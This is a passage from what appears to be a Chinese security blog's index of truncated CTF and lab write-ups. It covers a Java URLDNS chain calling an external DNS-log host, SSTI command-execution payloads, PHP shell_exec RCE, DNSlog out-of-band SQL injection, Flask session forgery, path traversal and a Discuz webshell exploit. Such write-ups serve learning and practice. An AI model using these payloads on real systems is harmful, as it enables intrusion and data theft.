Y0n3er

前言感觉最近Java考的用的很多，自己对于Java是0基础，让我迫切想要开始学，看了大佬的学习链是从开发开始，那样感觉就太慢了而且自己对于开发兴趣不大，但是偏偏又离不开开发，只能边学开发边看安全，虽然有点急了但是也没办法了 一点建议如果没有学过Java或者不了解idea的操作的话开始CC链之前强烈建议先跟URLDNS链，把该踩的坑踩了再弄CC链会顺畅很多 环境配置这里我就列一下自己踩的坑，作为一个对Java和idea不熟悉的新手容易犯的错 jdkjdk要求是jdk8u65，在官网我下载的时候选择8u65但是下载的却不是，另外的平台安装会同时安装jdk和jre我们需要的是jdk不要把jre也放在jdk目录下，不然idea导入jdk会失败下载完的目录如下 加入依赖1234567<dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</art ...

先放代码，感觉还是自己跟着视频手写一遍更好理解，很多理解放在注释中了 12345678910111213141516171819202122232425262728293031323334import java.lang.reflect.Field; import java.util.HashMap; //入口类 import java.net.URL; //调用链中的类 import java.io.*; public class URLDNS { public static void main(String[] args) throws Exception{ HashMap <URL,Object> hashMap = new HashMap<>(); URL url = new URL("http://vnmkzfpuho.dnstunnel.run"); //通过反射获取到url中的hashcode属性 Fiel ...

level 1前面的试探就不弄了，当然也可以试一下看自己环境有没有问题先给出payload：{{"".__class__.__bases__[0].__subclasses__()[143].__init__.__globals__['popen']("type flag").read()}}这里找的是os._wrap_close通过脚本搜索下标为143，初始化之后可以使用popen来打开flag，这里有一个点卡了我很久，就是"type flag"我一直使用"cat flag"得不到flag，而我一开始是不知道type这个命令的，看到SSTI-Labs靶场 - o2takuXX の blogo2takuXX の blog这篇博客才知道type命令通过GPT的回答应该是由于我在Windows下部署的环境导致的问题，最终使用type得到flag当然可以用的模块很多，可以参考一下网上其它博主的wp，这里就不一一列举了 level 2这一关过滤了{{`可以用`{% %}`来绕 ...

ec_RCE一个比较简单的题，但是需要看懂代码 123456789101112131415<!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW --><!-- By 探姬 --><?PHP if(!isset($_POST["action"]) && !isset($_POST["data"])) show_source(__FILE__); putenv('LANG=zh_TW.utf8'); $action = $_POST["action"]; $data = "'".$_POST["data"]."'"; $output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $ ...

应用场景 当我们对一个数据库进行注入时，无回显，且无法进行时间注入，那么就可以利用一个通道，把查询到数据通过通道带出去，这里的通道包括：http请求、DNS解析、SMB服务等将数据带出。 DNS是什么DNS原理及其解析过程_king9666的博客-CSDN博客DNS( Domain Name System)是“域名系统”的英文缩写，是一种组织成域层次结构的计算机和网络服务命名系统，它用于TCP/IP网络，它所提供的服务是用来将主机名和域名转换为IP地址的工作。DNS就是这样的一位“翻译者”.同时,DNS是一个分布式数据库系统，它提供将域名转换成对应IP地址的信息。这种将名称转换成IP地址的方法称为域名解析。所以在申请域名的时候都要将域名所指向的IP地址提交给NIC。这样就要求你的IP必须是固定的才可以申请域名。简单来说就是将域名解析为ip 然后我们找一个特定的可以记录DNS解析的网站DNSLog Platform这个网站就可以看到DNS解析记录，将回显打到这个网站从而实现注入先看看网站的使用，进入点击Get SubDomain可以获得一个域名然后ping一下这个域名可以看到能 ...

首先得感谢lengf师傅给解答一些很傻的问题 这个题后面涉及到的知识点之前还没学过，先看看吧进入题目注册一个账号发现admin已经被注册，这里就要想到session伪造，以admin登录要伪造session就得知道key，在Blog路由的flask 基础总结这篇文章找到key然后用工具伪造python flask_session_cookie_manager3.py encode -s 7his_1s_my_fav0rite_ke7 -t "{'_permanent':True,'username':'admin'}"以admin登录会发现多了一个Download路由点进入是一张图片，抓包，存在目录穿越，这里是用.//./绕过，源码过滤方式为.replace('..', '').replace('//', '')源码在app/app.py 12345678910111213141516171819202122232425262 ...

搭建这个题目本意就是想学习一下dockerfile和docker-compose.yml文件的使用，原理讲的不透彻，主要记录一下操作 首先在本地把解题的源码写完，再上传到服务器files下放的是flag.php和index.php 1234567891011//index.php<?php highlight_file(__FILE__);if(strlen($_GET[1])<=7){ echo strlen($_GET[1]); echo '<hr/>'; echo shell_exec($_GET[1]);}else{ exit('too long');}?> if(strlen($_GET[1])<=7)这里我一开始测试用的小于8，然后这里改了也没再测试，意思都一样，然后网上这里用的小于7，这样的话7字符根本就过不了言归正传，我们先看一下dockerfile 1234567891011FROM ctftraining/base_image_ngi ...

前言关于用docker出题的文章实在是太少了，所以自己在学习的时候记录一下docker的一些基本搭建在这里就不一一说明了，这里只记录一下如何把一个题目弄出来，可能有些地方也有错误 进入主题按我自己的理解就是先拉取一个镜像用来布置题目所需的环境以及容器所需我这里使用ctftraining/base_image_nginx_mysql_php_73 这个镜像一开始我用的tutum/lamp但是发现这个镜像有点问题不能显示中文，可能是dockerfile没设置拉取镜像docker pull ctftraining/base_image_nginx_mysql_php_73 这里我已经拉取了，所以列一下然后使用ctftraining/base_image_nginx_mysql_php_73镜像启动一个容器，同时映射到服务器的2333端口 docker run -d -p 2333:80 ctftraining/base_image_nginx_mysql_php_73可以看到已经启动了一个容器，然后就是弄出题文件了，先上传到服务器的/var/www/h ...

web签到小能手直接扫目录发现有个index.php.bak下载打开得到 开胃菜ls根目录看到flag然后cat，这里好像可以忽略空格，可能是非预期吧，这里也可以用nl直接出来 小镇做题家扫出来robots.txt，访问/GAME/index.html查看js代码base64解码访问/GAME/f14g_in_there_hha/index.php然后GAME/f14g_in_there_hha/index.php?payload=;cat%09/* Discuz参考这篇文章(Discuz 7.x/6.x 全局变量防御绕过导致代码执行漏洞复现 - 腾讯云开发者社区-腾讯云 (tencent.com))直接访问存在漏洞的地方但是在tid这里困了很久然后一直找终于又找到一篇博客(discuz7.2漏洞复现–python编写poc - FreeBuf网络安全行业门户) 直接tid改为10，运气不错拿到shell接下来把webshell写入，payload： 1GLOBALS[_DCACHE] ...

Funny_web这个题一开始就没做，不知道账号和密码算是他们内部题吧 然后进去之后看源码 1234567891011121314<?php error_reporting(0); header("Content-Type: text/html;charset=utf-8"); highlight_file(__FILE__); include('flag.php'); if (isset($_GET['num'])) { $num = $_GET['num']; if ($num != '12345') { if (intval($num) == '12345') { echo $FLAG; } } else { echo "这为何相等又不相等";
...

hexo+GitHub搭建 基本步骤直接看视频地址 建议放博客的文件夹不要放中文，我在执行hexo init时一直报错，但是把中文名去掉之后就好了 主题设置 打开你创建的放博客内容的文件夹 打开_config.yml文件，我这里用vscode打开的 将theme后面的东西改为你的主题名，你下载好的主题名在themes中能看到，至于怎么下载可以在[官网](Themes | Hexo)选一个喜欢的使用命令下载，也可以直接在GitHub将文件下载然后解压到themes文件里 执行hexo三连 123hexo cl //清除缓存hexo g //生成静态文件，个人理解将md转为htmlhexo s //本地预览 满意之后上线 1hexo d 主题的个性化这一步我想换我自己喜欢的图片，横幅背景，导航栏logo，但是一直失败按照官方文档配置也不行，只能用默认，等以后研究明白了再弄。 图床的使用我用的是[路过图床](路过图床 - 免费图片上传, 专业图片外链, 免费公共图床 (imgse.com))看网上的教程使用插件没成功，Picgo装好了启动不了就很懵 使用：直接把图片上传 ...